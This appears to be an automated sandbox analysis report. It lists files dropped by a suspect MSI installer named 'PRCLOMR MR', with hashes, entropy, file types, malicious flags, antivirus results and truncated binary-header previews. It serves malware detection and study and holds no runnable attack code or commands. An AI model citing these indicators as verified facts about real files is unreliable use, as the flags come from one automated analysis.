                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):702976
                              Entropy (8bit):4.9566523846266755
                              Encrypted:false
                              SSDEEP:6144:n3cKjnv2eBLM6XxJ7UBebH6dEM4JjQvpi1p+e+WRc3RPMTNm:NwetyebH6dK3p+bsNm
                              MD5:27563EEA952684C3E2F5A35A81E021DF
                              SHA1:BC46C79DACE897088F989D3A34757D7592110B7D
                              SHA-256:EADCC6AD7B87CD61D5899A45D08A9D9897AFA62810048E1F1D448C696543EF46
                              SHA-512:9DB1BA740B7B1BD386751BD7EA1CF8BDF30D3A139F0AF81B2D652DBEA9153CE8038EAAE084DDF4F3136560BD00B68A8040C84DE1115658CF5B2E1C31CF99718A
                              Malicious:true
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7).f...........!..................... ........... ....................... ............@.........................L...(.......O.... ..`....................@..0.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...`.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):702976
                              Entropy (8bit):4.9566523846266755
                              Encrypted:false
                              SSDEEP:6144:n3cKjnv2eBLM6XxJ7UBebH6dEM4JjQvpi1p+e+WRc3RPMTNm:NwetyebH6dK3p+bsNm
                              MD5:27563EEA952684C3E2F5A35A81E021DF
                              SHA1:BC46C79DACE897088F989D3A34757D7592110B7D
                              SHA-256:EADCC6AD7B87CD61D5899A45D08A9D9897AFA62810048E1F1D448C696543EF46
                              SHA-512:9DB1BA740B7B1BD386751BD7EA1CF8BDF30D3A139F0AF81B2D652DBEA9153CE8038EAAE084DDF4F3136560BD00B68A8040C84DE1115658CF5B2E1C31CF99718A
                              Malicious:true
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7).f...........!..................... ........... ....................... ............@.........................L...(.......O.... ..`....................@..0.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...`.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):358000
                              Entropy (8bit):7.242791638339027
                              Encrypted:false
                              SSDEEP:6144:zw4WNZknl8n6n33FxsZK2dx8ltV0Funq3QgiR3xtQAmUPP+UX32U+rv4T+rvS:zw9mSny3rGKV/0gnG8R3xtj1PP+C32U/
                              MD5:65CD1FFDB524F091FC06884DCB1270F9
                              SHA1:5AC35832CC0DCE15799565D605B12FD15ADB4DC7
                              SHA-256:32573224BE0A365DD4A94E5D7812D9CC98B4ACB60A3E85B2B8EA97EB2377E81D
                              SHA-512:BA9B6EFD5B8815628AAD54FCB7FB4AFB4C041D7B7140754259D7355728E388A371F81DD58F1D9CE3483D0D70F05EBC771EB6F3022EF17A0DB2A76273FB2F69D9
                              Malicious:true
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........g....}...}...}-..|...}-..|[..}...|...}...|...}...|...}E..|...}-..|...}-..|...}-..|...}...}...}...}{..}E..|...}E..}...}...}...}E..|...}Rich...}................PE..L...Y..e.................P..........p.............@.......................................@................................................................... ..................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):4.0081320258334
                              Encrypted:false
                              SSDEEP:3:1EyEMyvn:1BEN
                              MD5:6BC190DD42A169DFA14515484427FC8E
                              SHA1:B53BD614A834416E4A20292AA291A6D2FC221A5E
                              SHA-256:B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
                              SHA-512:5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
                              Malicious:false
                              Preview:[General]..Active = true..
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):13388
                              Entropy (8bit):5.413023695998468
                              Encrypted:false
                              SSDEEP:384:tG1fkJQa+HCOvWMUMdDm1aZDCrgYhqrmKl0FdJxxvw/zFO8xDP:tG1fkJQa+HCOvWMUMdDm1aZDCrgUqrmE
                              MD5:23FD4FCCEF47C1BFCBF8B80DF8F02115
                              SHA1:40A1010D0DDC22A0FA86F224F3E63D4C1852E11C
                              SHA-256:D4FB66DF06B5DB5A90381C1A2B1EF6C3A46AD25BF9FC95023E04A71F5C5AD01A
                              SHA-512:02A602D57FD315A9F4374C06FA8B0E5BD16DFF8D0ABA8DF8693621A4D12008FBA88F43DF3727801CDCFE363C1EAA6614108CC32BD3CE70A93B74D11259C1926E
                              Malicious:false
                              Preview:[Hit {1EB6A1EB-8DD2-4460-AB6D-C45D38D3F2E4}]..Queue Time = 93..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 66ac0c9e2ff508bfba878aa5..Application Version = 8.7.6.8..Client ID = 94BCABD9E1EBB3E75B71854540642746D0A25913..Session ID = {AF3E5550-CCB7-4030-8139-9A55D2075DE7}....[Hit {6B773C25-23EA-4760-AEC7-1608F4577E23}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 66ac0c9e2ff508bfba878aa5..Application Version = 8.7.6.8..Client ID = 94BCABD9E1EBB3E75B71854540642746D0A25913..Session ID = {AF3E5550-CCB7-4030-8139-9A55D2075DE7}....[Hit {1D68D7A3-DCC4-42FB-9D17-D7DAF13C7148}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 66ac0c9e2ff508bfba878aa5..Application Version = 8.7.6.8..Client ID = 94BCABD9E1EBB3E75B71854540642746D0A25913..Session ID = {AF3E5550-CCB7-4030-8139-9A55D2075DE7}....[Hit {0D51CAED-92AF-4C30-B938-D9AF0E349F91}]
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4509696
                              Entropy (8bit):6.100941182830929
                              Encrypted:false
                              SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                              MD5:F6153E803F1533042AC7E6988237C2C3
                              SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                              SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                              SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: LisectAVT_2403002B_409.exe, Detection: malicious, Browse
                              • Filename: AnyDesk.msi, Detection: malicious, Browse
                              • Filename: LisectAVT_2403002B_493.exe, Detection: malicious, Browse
                              • Filename: LisectAVT_2403002B_493.exe, Detection: malicious, Browse
                              • Filename: WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi, Detection: malicious, Browse
                              • Filename: 0cjB1Kh8zU.msi, Detection: malicious, Browse
                              • Filename: 2ztvLMT477.msi, Detection: malicious, Browse
                              • Filename: ahx8PyqunR.msi, Detection: malicious, Browse
                              • Filename: speke.msi, Detection: malicious, Browse
                              • Filename: d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):83128
                              Entropy (8bit):6.654653670108596
                              Encrypted:false
                              SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                              MD5:125B0F6BF378358E4F9C837FF6682D94
                              SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                              SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                              SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6
                              Entropy (8bit):2.2516291673878226
                              Encrypted:false
                              SSDEEP:3:gpyn:g4n
                              MD5:A067F5EC97BA51B576825B69BC855E58
                              SHA1:907D296538A45D5B593512881D721C7D347B8E04
                              SHA-256:CF3E339D25C3C023C9417FFC5D8E73F1DA828B18FEECAF14FDB9C24D04E49BA0
                              SHA-512:F6058F37CF764E6CD807D9C0E9DE881849E4C94EC1D2E0C0EB504ABF77147E77CB09113B087E1C10E790C3EC45780E5986D29B2A84B364C5F697F884B1549F4D
                              Malicious:false
                              Preview:NULL..
                              Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {884C282A-B0FB-4975-844E-5DC3BC12BA4B}, Number of Words: 10, Subject: PRCLOMR MR, Author: PRCLOMR MR, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1046, Comments: A base dados do instalador contém a lógica e os dados PRCLOMR MR necessários para instalar o PRCLOMR MR., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                              Category:dropped
                              Size (bytes):12885696
                              Entropy (8bit):7.898527997571246
                              Encrypted:false
                              SSDEEP:393216:x99OsRVjtNK9oUMZ73hrLcoV7UBOQZ3M+:x9lN+HWlLco+MQhp
                              MD5:E39E03A8E95AEC841D8EC9E1AB3D5706
                              SHA1:3D9812935A2413FEA198C3B11BF48769385BB077
                              SHA-256:7B67C71AE5AA24C92655D29E37896F639FA42FA79713B174C6A660F5C19E49A2
                              SHA-512:4878F455E8824ED2914F4A155DAEB501CF45385440CFE6CC91FD43DFE68C4F014202F67DB389A1A06DE20BD0053231C91ECBF4F7D03E66ECEFAC1C64DE4D9CDC
                              Malicious:false
                              Preview:......................>...................$...................................................................................................................J...K...L...M...N...O...P...Q...R...S...T...U...........v...................................................................................................................................................................................................................................................................................................................c...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...@...C...9...:...;...<...=...>...?...Q...A...B...H...D...E...F...G...p...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......b...d...u...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...v.......w...x...y...z...
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):878560
                              Entropy (8bit):6.452749824306929
                              Encrypted:false
                              SSDEEP:24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
                              MD5:D51A7E3BCE34C74638E89366DEEE2AAB
                              SHA1:0E68022B52C288E8CDFFE85739DE1194253A7EF0
                              SHA-256:7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
                              SHA-512:8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:data
                              Category:modified
                              Size (bytes):2363
                              Entropy (8bit):5.527069650585703
                              Encrypted:false
                              SSDEEP:48:/xuL2UA4b7wNY+DwX1AX6gnwVEnkanDwEfqkKfr47CMTaH:5uVACWTDG1i6gncEkiDhfqkKfrsaH
                              MD5:2462B04E1000D6AE7FD6487765DAD21A
                              SHA1:1B0BA21F2F11748F546A7ADD0EE60D79C15775B0
                              SHA-256:5F839FA5B5A6200CA56A48876FC7A9398D31329529B0DDACE251C39B8CF732C4
                              SHA-512:49F792DA0F4154786D67C19D197720778C4A97FEE6F375C4487BE0ABE5F6B92975B9B90440369D8A006224ABB890DCFFC83042415986E7A8963666C9FFF3CEBC
                              Malicious:false
                              Preview:...@IXOS.@.....@.B.Y.@.....@.....@.....@.....@.....@......&.{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}..PRCLOMR MR..9rybs.msi.@.....@.....@.....@........&.{884C282A-B0FB-4975-844E-5DC3BC12BA4B}.....@.....@.....@.....@.......@.....@.....@.......@......PRCLOMR MR......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{9A647FB6-8DED-4CFE-ACBA-2BDC554A74E7}4.C:\Users\user\AppData\Roaming\PRCLOMR MR\PRCLOMR MR\.@.......@.....@.....@......&.{5B41ECFF-AC7E-444D-A1FB-D627EBF6BEE1}*.01:\Software\PRCLOMR MR\PRCLOMR MR\Version.@.......@.....@.....@......&.{82C9FF59-DD7E-4CEC-8A97-4FEE517BCB1B}K.01:\Software\PRCLOMR MR\{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}\AI_IA_ENABLE.@.......@.....@.....@........CreateFolders..Criando novas pastas..Pasta: [1]".4.C:\Users\user\AppData\Roaming\PRCLOMR MR\PRCLOMR MR\.@........WriteRegistryValues,.Escrevendo os
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):1.1629763799366026
                              Encrypted:false
                              SSDEEP:12:JSbX72FjR/fiAGiLIlHVRpMh/7777777777777777777777777vDHF8Zm2WEQp3j:JCQI5cR2WEq6F
                              MD5:07348CF3B1AFA58D96732BBB8132E577
                              SHA1:E9898F672161D04B252FF7FF2AED8287DAACF70B
                              SHA-256:ECD7D4EF5E08C22EF7D121B0A756D82D6D8DAC422C4589A5A21E97308D22BB32
                              SHA-512:83A9447A98E09C77C3050160C13847D9003F184F4C1E0C54F455F1DFE487480B702A03BCCD65808C36F6204497AD82A49A5931CADB8ACD4A2A88DCF17A982F24
                              Malicious:false
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):1.8163106328726237
                              Encrypted:false
                              SSDEEP:96:Phl1uFTZcdvRl1vR8v5CbFWco2WGlvRl1vRW:T1ct2vRl1vR8vOFWFGlvRl1vRW
                              MD5:7F714784E1BBE635E34F04CB6DB7E421
                              SHA1:3198BF6EE9A7BDA0126FEF075A9A9111FFD50F41
                              SHA-256:FBCE84DC1BCAF6AF6EF2BF1A5FA35852C2EE52C64B464A6E04FDF1B739E38FD4
                              SHA-512:6BCFD534765480E1D50A3BC84F7736600FAAA1E69A0A50E364C8B8EB89BAB12C77EF8445AA1F27467C52D1B00637B4A86D4F9AA8F9DA68281DF3BC6AF3A36818
                              Malicious:false
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):360001
                              Entropy (8bit):5.362964772669496
                              Encrypted:false
                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauh:zTtbmkExhMJCIpE8
                              MD5:413FE814F0C1F41F1F87970315F0FA27
                              SHA1:5D95820EEBDCB43C619BD1C9D70A2060AC9FA700
                              SHA-256:FD7850FAC79B8B68DB2FB86E866A6B4EB98F1F86B4E8677864F61F00EB9B07A4
                              SHA-512:AAD2D212107C85A676D8CDC7BEA51BD9A4705B53423DBC559606F75B7C66645D16CF8E568B84D8DB7CA149B63353AB6D52EA6D0D0BD1D75FB0EAD14AA5B2BCDC
                              Malicious:false
                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):49152
                              Entropy (8bit):1.1930649884596116
                              Encrypted:false
                              SSDEEP:96:9dToTZ8+cdvRl1vR8v5CbFWco2WGlvRl1vRW:bTodl2vRl1vR8vOFWFGlvRl1vRW
                              MD5:D775FEA4C65C18EA262E874595C06CAF
                              SHA1:70D1301402AEE425780717C2012AC1081414D5B2
                              SHA-256:29D97A87CF031E01DBB014257E9C54F114E89E335126EEF79715B88D88789033
                              SHA-512:436A7D77BAAAA432B2086CFF7422E567C835158D1B714B6048E7A8829BD99DC929F13A1ABFD0D047D70C64808CE4C3A5C3B3EE394F28AEE0A0C4689B61C3D5F4
                              Malicious:false
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):512
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3::
                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                              Malicious:false
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):73728
                              Entropy (8bit):0.29529501426038246
                              Encrypted:false
                              SSDEEP:48:0s1TyvRlSuvRwvRlSuvRrAEu5CyEcTgt8xfoHswXGcp4ru2xBxYxMxqxrxbxEoyO:0VvRl1vRwvRl1vR8v5CbFWco2WGcm
                              MD5:5138C79271D9FB58310A415CDCD83DFF
                              SHA1:C01B984548F238802F8E6E86EF522E5F8C314631
                              SHA-256:36C332089A099DF8B8505677DC9617C179429F26136A678E1CF075F444FA19F2
                              SHA-512:5DA89A3FBA1D20C9C6A7A2C217748E466ECB6A72747C0F740D75D8BF30AA7E9611992E27A42971998C8C1ADE1E811E3AD88B01C88376F69D2DA47002D85C8FD8
                              Malicious:false
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):0.06919560449229753
                              Encrypted:false
                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOsMcFLm2WEXyVky6l3X:2F0i8n0itFzDHF8Zm2WEx3X
                              MD5:D49179985AEBAFA5B733C4D4281B017E
                              SHA1:EB2EFEC23039CB85C44BDF406252E46A4BFAAA62
                              SHA-256:551A1EFABB277C998BA8127123E34D36E4A8203826ED33B61C80C931021809DA
                              SHA-512:954D57A9FA42C9DFDCF89FBE5CCFE4F1F3FF551949FD19C0985A7622DF18372D36C3525D71C1531502345D2EF4BF0C996F691C9629D2E64331CAB7B6E3309F49
                              Malicious:false
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:data
